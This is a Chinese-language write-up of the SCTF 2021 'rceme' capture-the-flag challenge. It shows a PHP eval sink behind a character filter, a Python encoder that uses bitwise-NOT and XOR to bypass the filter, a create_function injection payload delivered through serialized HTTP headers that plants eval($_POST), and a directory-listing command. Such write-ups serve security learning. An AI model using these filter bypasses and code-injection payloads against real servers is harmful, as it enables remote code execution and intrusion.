1.[SCTF 2021]rceme

总结下获取disabled_funciton的方式 

1.phpinfo()

2.var_dump(ini_get(“disable_functions”));

3.var_dump(get_cfg_var(“disable_functions”));

其他的

var_dump(get_cfg_var(“open_basedir”));

var_dump(ini_get_all());

<?php
if(isset($_POST['cmd'])){
    $code = $_POST['cmd'];
    if(preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
        die('<script>alert(\'Try harder!\');history.back()</script>');
    }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
        @eval($code);
        die();
    }
} else {
    highlight_file(__FILE__);
    var_dump(ini_get("disable_functions"));
}
?>

剩下符号：().:[]{}*%#@!~ 

 异或脚本 这里用的是取反结合异或[!%FF]

def one(s):
    ss = ""
    for each in s:
        ss += "%" + str(hex(255 - ord(each)))[2:].upper()
    return f"[~{ss}][!%FF]("
b=1
while b<2:
    a = input(":>").strip(")")
    aa = a.split("(")
    s = ""
    for each in aa[:-1]:
        s += one(each)
    s += ")" * (len(aa) - 1) + ";"
    b+=1
    print(s)

 构造payload  

可用通过unserialize和可变参数来传入多个参数

create_funtion本质是语法解析的。可以直接注入eval

create_function(...unserialize(getallheaders()))
  
[~%9C%8D%9A%9E%8B%9A%A0%99%8A%91%9C%8B%96%90%91][!%FF](...[~%8A%91%8C%9A%8D%96%9E%93%96%85%9A][!%FF]([~%9A%91%9B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]())));

http heades 传入一个序列化的参数数组

<?php
$arr=['','}eval($_POST["a"]);//'];
$str=serialize($arr);
echo $str;
 
=> a:2:{i:0;s:0:"";i:1;s:21:"}eval($_POST["a"]);//";}

 通过php原生类DirectoryIterator来读取目录,发现根目录下有flag以及readflag,flag我们没有读取的权限，所以通过执行readflag来获取flag

a=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}